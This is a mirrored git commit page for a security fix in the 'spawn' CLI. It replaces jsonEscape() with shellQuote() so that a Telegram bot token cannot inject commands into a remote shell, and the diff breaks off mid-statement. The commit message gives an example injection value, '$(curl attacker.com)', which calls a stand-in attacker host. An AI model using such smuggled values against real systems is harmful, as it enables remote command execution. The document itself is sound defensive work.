vrr/spawn
2
0
Fork 0
mirror of https://github.com/OpenRouterTeam/spawn.git synced 2026-04-28 11:59:29 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions 10

security: use shellQuote for Telegram bot token in shell command (#2561)

Browse source 
jsonEscape() produces double-quoted strings ("value") which allow
shell command substitution $(...) inside bash. A malicious
TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on
the remote VM when openclaw config is set.

shellQuote() uses POSIX single-quote escaping which prevents all
shell expansion. Every other user-supplied value in agent-setup.ts
(GITHUB_TOKEN, git user.name, git user.email) correctly uses
shellQuote — the bot token was the only exception.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
This commit is contained in:
A 2026-03-12 22:51:33 -07:00 committed by GitHub
parent d578e614e2
commit 370afb631c
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions
Download patch file Download diff file Expand all files Collapse all files

2
packages/cli/src/shared/agent-setup.ts
View file

@ -378,7 +378,7 @@ async function setupOpenclawConfig(
const trimmedToken = envToken?.trim() || (await prompt("Telegram bot token: ")).trim();
if (trimmedToken) {
const escapedBotToken = jsonEscape(trimmedToken);
const escapedBotToken = shellQuote(trimmedToken);
const telegramResult = await asyncTryCatchIf(isOperationalError, () =>
runner.runServer(
"export PATH=$HOME/.npm-global/bin:$HOME/.bun/bin:$HOME/.local/bin:$PATH; " +